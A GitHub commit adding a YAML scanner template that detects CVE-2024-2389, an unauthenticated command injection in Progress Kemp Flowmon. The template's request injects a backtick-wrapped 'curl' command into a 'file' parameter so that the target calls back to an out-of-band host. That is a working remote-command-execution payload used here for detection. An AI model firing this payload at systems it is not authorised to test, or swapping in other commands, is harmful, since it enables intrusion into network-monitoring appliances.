Create CVE-2024-2389.yaml

patch-1
Parth Malhotra 2024-04-20 02:36:59 +05:30 committed by GitHub
parent 999c7bfb49
commit da66e196b3
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 28 additions and 0 deletions

View File

@ -0,0 +1,28 @@
id: CVE-2024-2389
info:
name: Progress Kemp Flowmon Command Injection (CVE-2024-2389)
author: pdresearch, parthmalhotra
severity: critical
description: In Flowmon versions prior to 11.1.14 and 12.3.5, an operating system command injection vulnerability has been identified. An unauthenticated user can gain entry to the system via the Flowmon management interface, allowing for the execution of arbitrary system commands.
reference:
- https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability
- https://www.flowmon.com
- https://twitter.com/wvuuuuuuuuuuuuu/status/1777977522140950640
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2024-2389
cwe-id: CWE-78
epss-score: 0.00043
epss-percentile: 0.07895
http:
- method: GET
path:
- "{{BaseURL}}/service.pdfs/confluence?lang=en&file=`curl+{{interactsh-url}}`"
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"